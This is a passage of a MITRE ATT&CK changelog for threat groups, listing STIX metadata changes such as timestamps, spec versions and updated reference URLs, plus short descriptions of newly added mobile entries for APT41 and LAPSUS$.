Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-24 18:50:40.179000+00:00 | 2025-04-16 20:37:33.761000+00:00 |
x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[G0001] Axiom
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 22:03:44.661000+00:00 | 2025-04-16 20:37:36.790000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0060] BRONZE BUTLER
Current version: 1.3
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-12 19:42:16.869000+00:00 | 2025-04-16 20:37:34.368000+00:00 |
[G0135] BackdoorDiplomacy
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-18 19:47:11.389000+00:00 | 2025-04-16 20:37:34.519000+00:00 |
[G0063] BlackOasis
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:37:41.036000+00:00 |
[G0098] BlackTech
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-06 13:14:27.477000+00:00 | 2025-04-16 20:37:33.408000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[G0008] Carbanak
Current version: 2.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-18 21:02:30.899000+00:00 | 2025-04-16 20:37:39.338000+00:00 |
[G0003] Cleaver
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-07-22 18:37:22.178000+00:00 | 2025-04-16 20:37:38.869000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[G0080] Cobalt Group
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-22 03:28:29.415000+00:00 | 2025-04-16 20:37:34.214000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0142] Confucius
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-22 20:43:16.504000+00:00 | 2025-04-16 20:37:36.476000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0052] CopyKittens
Current version: 1.6
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-08-08 21:29:36.462000+00:00 | 2024-11-17 12:44:07.637000+00:00 |
external_references[4]['description'] | Minerva Labs LTD and ClearSky Cyber Security. (2015, November 23). CopyKittens Attack Group. Retrieved September 11, 2017. | Minerva Labs LTD and ClearSky Cyber Security. (2015, November 23). CopyKittens Attack Group. Retrieved November 17, 2024. |
external_references[4]['url'] | https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf | https://cdn2.hubspot.net/hubfs/1903456/Whitepapers/CopyKittens.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[G0079] DarkHydrus
Current version: 1.3
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-12 19:52:22.454000+00:00 | 2025-04-16 20:37:39.039000+00:00 |
[G0105] DarkVishnya
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-12 22:10:04.107000+00:00 | 2025-04-16 20:37:35.190000+00:00 |
[G0009] Deep Panda
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-07-20 20:10:29.593000+00:00 | 2025-04-16 20:37:39.486000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[G0017] DragonOK
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2019-03-22 20:10:32.917000+00:00 | 2024-11-17 16:27:34.666000+00:00 |
external_references[2]['description'] | Haq, T., Moran, N., Vashisht, S., Scott, M. (2014, September). OPERATION QUANTUM ENTANGLEMENT. Retrieved November 4, 2015. | Haq, T., Moran, N., Vashisht, S., Scott, M. (2014, September). OPERATION QUANTUM ENTANGLEMENT. Retrieved November 17, 2024. |
external_references[2]['url'] | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf | https://web.archive.org/web/20210920193513/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf |
[G1011] EXOTIC LILY
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-24 18:48:18.917000+00:00 | 2025-04-16 20:37:34.060000+00:00 |
x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[G0066] Elderwood
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-11 02:36:24.044000+00:00 | 2024-11-17 19:55:07.587000+00:00 |
external_references[6]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved November 17, 2024. |
external_references[6]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf |
[G0020] Equation
Current version: 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-06-29 01:39:22.044000+00:00 | 2025-04-16 20:37:33.110000+00:00 |
[G0120] Evilnum
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-27 19:55:58.323000+00:00 | 2025-04-16 20:37:38.720000+00:00 |
[G0051] FIN10
Current version: 1.3
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-05-26 12:35:39.400000+00:00 | 2024-11-17 14:57:09.164000+00:00 |
external_references[2]['description'] | FireEye iSIGHT Intelligence. (2017, June 16). FIN10: Anatomy of a Cyber Extortion Operation. Retrieved June 25, 2017. | FireEye iSIGHT Intelligence. (2017, June 16). FIN10: Anatomy of a Cyber Extortion Operation. Retrieved November 17, 2024. |
external_references[2]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf | https://services.google.com/fh/files/misc/rpt-fin-10-anatomy-of-a-cyber-en.pdf |
[G0085] FIN4
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-02-01 21:27:44.778000+00:00 | 2024-11-17 15:57:47.485000+00:00 |
external_references[2]['description'] | Dennesen, K. et al.. (2014, November 30). FIN4: Stealing Insider Information for an Advantage in Stock Trading?. Retrieved December 17, 2018. | Dennesen, K. et al.. (2014, November 30). FIN4: Stealing Insider Information for an Advantage in Stock Trading?. Retrieved November 17, 2024. |
external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html | https://web.archive.org/web/20190508171649/https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0053] FIN5
Current version: 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-16 19:48:37.809000+00:00 | 2025-04-16 20:37:38.089000+00:00 |
[G0037] FIN6
Current version: 4.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-01-08 22:13:27.588000+00:00 | 2024-11-17 14:59:25.749000+00:00 |
external_references[8]['description'] | FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016. | FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved November 17, 2024. |
external_references[8]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf | https://web.archive.org/web/20190807112824/https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf |
[G0061] FIN8
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 14:08:59.296000+00:00 | 2025-04-16 20:37:35.846000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0137] Ferocious Kitten
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-25 14:28:10.337000+00:00 | 2025-04-16 20:37:40.731000+00:00 |
[G0036] GCMAN
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 19:03:44.853000+00:00 | 2025-04-16 20:37:40.552000+00:00 |
[G0115] GOLD SOUTHFIELD
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-28 20:49:53.223000+00:00 | 2025-04-16 20:37:38.397000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0084] Gallmaker
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 19:04:47.798000+00:00 | 2025-04-16 20:37:40.106000+00:00 |
[G0078] Gorgon Group
Current version: 1.5
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-12 21:57:25.847000+00:00 | 2025-04-16 20:37:36.314000+00:00 |
[G0136] IndigoZebra
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-16 02:06:06.404000+00:00 | 2025-04-16 20:37:41.185000+00:00 |
[G0140] LazyScripter
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-22 04:49:29.731000+00:00 | 2024-11-17 14:12:07.294000+00:00 |
external_references[2]['description'] | Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021. | Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 17, 2024. |
external_references[2]['url'] | https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf | https://web.archive.org/web/20211003035156/https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0077] Leafminer
Current version: 2.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-22 04:50:51.782000+00:00 | 2025-04-16 20:37:33.912000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G1014] LuminousMoth
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-17 21:49:16.371000+00:00 | 2025-04-16 20:37:32.806000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0095] Machete
Current version: 2.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-06 19:26:47.988000+00:00 | 2025-04-16 20:37:37.929000+00:00 |
[G0059] Magic Hound
Current version: 6.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-07-10 18:56:00.833000+00:00 | 2024-11-17 16:17:26.385000+00:00 |
external_references[19]['description'] | Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018. | Mandiant. (2018). Mandiant M-Trends 2018. Retrieved November 17, 2024. |
external_references[19]['url'] | https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf | https://static.carahsoft.com/concrete/files/1015/2779/3571/M-Trends-2018-Report.pdf |
[G0002] Moafee
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 19:09:42.298000+00:00 | 2025-04-16 20:37:41.833000+00:00 |
[G0021] Molerats
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-11 00:40:46.966000+00:00 | 2024-11-17 15:50:27.600000+00:00 |
external_references[8]['description'] | Villeneuve, N., Haq, H., Moran, N. (2013, August 23). OPERATION MOLERATS: MIDDLE EAST CYBER ATTACKS USING POISON IVY. Retrieved April 1, 2016. | Villeneuve, N., Haq, H., Moran, N. (2013, August 23). OPERATION MOLERATS: MIDDLE EAST CYBER ATTACKS USING POISON IVY. Retrieved November 17, 2024. |
external_references[8]['url'] | https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html | https://web.archive.org/web/20201031075438/https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html |
[G1019] MoustachedBouncer
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-26 14:34:08.342000+00:00 | 2025-04-16 20:37:40.255000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0129] Mustang Panda
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-22 22:01:13.781000+00:00 | 2025-04-16 20:37:34.723000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0055] NEODYMIUM
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2019-03-25 14:31:40.855000+00:00 | 2025-04-16 20:37:41.988000+00:00 |
[G0019] Naikon
Current version: 2.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-08-19 18:23:23.507000+00:00 | 2025-04-16 20:37:37.579000+00:00 |
[G0133] Nomadic Octopus
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-09-02 18:03:55.294000+00:00 | 2025-04-16 20:37:36.955000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[G0068] PLATINUM
Current version: 1.3
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-04-22 00:39:49.529000+00:00 | 2025-04-16 20:37:35.512000+00:00 |
[G0040] Patchwork
Current version: 1.5
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-03-22 05:08:20.780000+00:00 | 2024-11-17 23:51:01.110000+00:00 |
external_references[5]['description'] | Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016. | Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved November 17, 2024. |
external_references[5]['url'] | https://web.archive.org/web/20180825085952/https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf | https://web.archive.org/web/20180825085952/https:/s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf |
external_references[6]['description'] | Fagerland, S., et al. (2013, May). Operation Hangover: Unveiling an Indian Cyberattack Infrastructure. Retrieved September 26, 2016. | Fagerland, S., et al. (2013, May). Operation Hangover: Unveiling an Indian Cyberattack Infrastructure. Retrieved November 17, 2024. |
external_references[6]['url'] | http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf | https://web.archive.org/web/20140424084220/http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0011] PittyTiger
Current version: 1.2
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-10-12 23:11:41.368000+00:00 | 2025-04-16 20:37:40.885000+00:00 |
[G0033] Poseidon Group
Current version: 1.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-03-18 20:25:54.945000+00:00 | 2025-04-16 20:37:39.948000+00:00 |
[G0024] Putter Panda
Current version: 1.2
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-04-11 00:24:27.983000+00:00 | 2024-11-17 16:43:16.049000+00:00 |
external_references[5]['description'] | Gross, J. and Walter, J.. (2016, January 12). Puttering into the Future.... Retrieved January 22, 2016. | Gross, J. and Walter, J.. (2016, January 12). Puttering into the Future.... Retrieved November 17, 2024. |
external_references[5]['url'] | http://blog.cylance.com/puttering-into-the-future | https://blogs.blackberry.com/en/2016/01/puttering-into-the-future |
[G0048] RTM
Current version: 1.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-05-12 22:16:44.650000+00:00 | 2025-04-16 20:37:34.877000+00:00 |
[G0106] Rocke
Current version: 1.0
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-06-19 20:41:21.215000+00:00 | 2025-04-16 20:37:36.004000+00:00 |
[G0029] Scarlet Mimic
Current version: 1.2
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-03-30 19:16:53.144000+00:00 | 2025-04-16 20:37:41.499000+00:00 |
[G1008] SideCopy
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 18:51:09.213000+00:00 | 2025-04-16 20:37:38.248000+00:00 |
x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[G0091] Silence
Current version: 2.2
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-03-22 05:34:46.346000+00:00 | 2024-11-17 18:19:52.955000+00:00 |
external_references[5]['description'] | Skulkin, O.. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved May 24, 2019. | Skulkin, O.. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved November 17, 2024. |
external_references[5]['url'] | https://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-forensic-analysis/ | https://web.archive.org/web/20220119133748/https://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-forensic-analysis/ |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0122] Silent Librarian
Current version: 1.0
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-04-21 12:02:00.278000+00:00 | 2025-04-16 20:37:39.188000+00:00 |
[G0054] Sowbug
Current version: 1.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-03-30 02:46:16.483000+00:00 | 2025-04-16 20:37:37.765000+00:00 |
[G0038] Stealth Falcon
Current version: 1.2
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-11-23 18:57:19.208000+00:00 | 2025-04-16 20:37:35.038000+00:00 |
[G0041] Strider
Current version: 1.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-06-29 01:43:19.374000+00:00 | 2025-04-16 20:37:41.346000+00:00 |
[G0039] Suckfly
Current version: 1.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-04-15 16:27:38.682000+00:00 | 2025-04-16 20:37:33.565000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[G0062] TA459
Current version: 1.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-03-30 19:22:32.962000+00:00 | 2025-04-16 20:37:37.273000+00:00 |
[G0127] TA551
Current version: 1.2
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-03-22 05:40:21.255000+00:00 | 2025-04-16 20:37:36.634000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0089] The White Company
Current version: 1.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-03-30 19:24:52.290000+00:00 | 2025-04-16 20:37:39.790000+00:00 |
[G0028] Threat Group-1314
Current version: 1.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-03-19 21:58:20.831000+00:00 | 2025-04-16 20:37:35.353000+00:00 |
[G0076] Thrip
Current version: 1.2
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-10-12 20:13:42.274000+00:00 | 2025-04-16 20:37:40.404000+00:00 |
[G0131] Tonto Team
Current version: 1.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-01-27 17:51:41.433000+00:00 | 2024-11-17 16:30:03.375000+00:00 |
external_references[8]['description'] | Nalani Fraser, Kelli Vanderlee. (2019, October 10). Achievement Unlocked - Chinese Cyber Espionage Evolves to Support Higher Level Missions. Retrieved October 17, 2021. | Nalani Fraser, Kelli Vanderlee. (2019, October 10). Achievement Unlocked - Chinese Cyber Espionage Evolves to Support Higher Level Missions. Retrieved November 17, 2024. |
external_references[8]['url'] | https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf | https://web.archive.org/web/20210308054208/https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf |
[G0123] Volatile Cedar
Current version: 1.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-04-20 20:08:15.870000+00:00 | 2025-04-16 20:37:38.546000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[G0090] WIRTE
Current version: 2.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-04-15 19:50:19.478000+00:00 | 2025-04-16 20:37:32.959000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[G0124] Windigo
Current version: 1.0
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-04-26 22:32:57.046000+00:00 | 2025-04-16 20:37:36.164000+00:00 |
[G0112] Windshift
Current version: 1.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-04-26 14:37:33.234000+00:00 | 2024-11-17 14:15:51.850000+00:00 |
external_references[2]['description'] | Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020. | Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved November 17, 2024. |
external_references[2]['url'] | https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf | https://www.scribd.com/document/661837258/WINDSHIFT-summit-archive-1554718868 |
[G0044] Winnti Group
Current version: 1.2
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-03-20 22:02:53.982000+00:00 | 2025-04-16 20:37:35.689000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0102] Wizard Spider
Current version: 4.0
Description diff (old → new): the two texts are identical except for the spelling fix "aresenal" → "arsenal" in "possesses a diverse arsenal of tools"; the full old and new description values are listed in the Details table.
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-04-03 20:21:34.872000+00:00 | 2025-03-12 20:33:21.597000+00:00 |
description | [Wizard Spider](https://attack.mitre.org/groups/G0102) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://attack.mitre.org/software/S0266) since at least 2016. [Wizard Spider](https://attack.mitre.org/groups/G0102) possesses a diverse aresenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: CrowdStrike Wizard Spider October 2020) | [Wizard Spider](https://attack.mitre.org/groups/G0102) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://attack.mitre.org/software/S0266) since at least 2016. [Wizard Spider](https://attack.mitre.org/groups/G0102) possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: CrowdStrike Wizard Spider October 2020) |
[G0018] admin@338
Current version: 1.2
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-03-18 19:54:59.120000+00:00 | 2025-04-16 20:37:33.261000+00:00 |
[G0045] menuPass
Current version: 3.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-09-19 14:30:03.922000+00:00 | 2024-11-17 23:19:12.450000+00:00 |
external_references[12]['description'] | Crowdstrike. (2013, October 16). CrowdCasts Monthly: You Have an Adversary Problem. Retrieved March 1, 2017. | Crowdstrike. (2013, October 16). CrowdCasts Monthly: You Have an Adversary Problem. Retrieved November 17, 2024. |
external_references[12]['url'] | https://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem | https://www.slideshare.net/slideshow/crowd-casts-monthly-you-have-an-adversary-problem/27262315 |
mobile-attack
New Groups
[G0096] APT41
Current version: 4.1
Description:
APT41 is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially motivated operations. Active since at least 2012, APT41 has been observed targeting various industries, including but not limited to the healthcare, telecom, technology, finance, education, retail, and video game industries in 14 countries.(Citation: apt41_mandiant) Notable behaviors include using a wide range of malware and tools to complete mission objectives. APT41 overlaps at least partially with public reporting on groups including BARIUM and Winnti Group.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
[G1004] LAPSUS$
Current version: 2.1
Description:
LAPSUS$ is a cyber criminal threat group that has been active since at least mid-2021. LAPSUS$ specializes in large-scale social engineering and extortion operations, including destructive attacks without the use of ransomware. The group has targeted organizations globally, including in the government, manufacturing, higher education, energy, healthcare, technology, telecommunications, and media sectors.(Citation: BBC LAPSUS Apr 2022)(Citation: MSTIC DEV-0537 Mar 2022)(Citation: UNIT 42 LAPSUS Mar 2022)
Minor Version Changes
[G0007] APT28
Current version: 5.2
Version changed from: 5.1 → 5.2
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-10-10 14:31:01.968000+00:00 | 2025-03-10 20:15:06.958000+00:00 |
external_references[22]['description'] | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017. | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved November 17, 2024. |
external_references[22]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf | https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf |
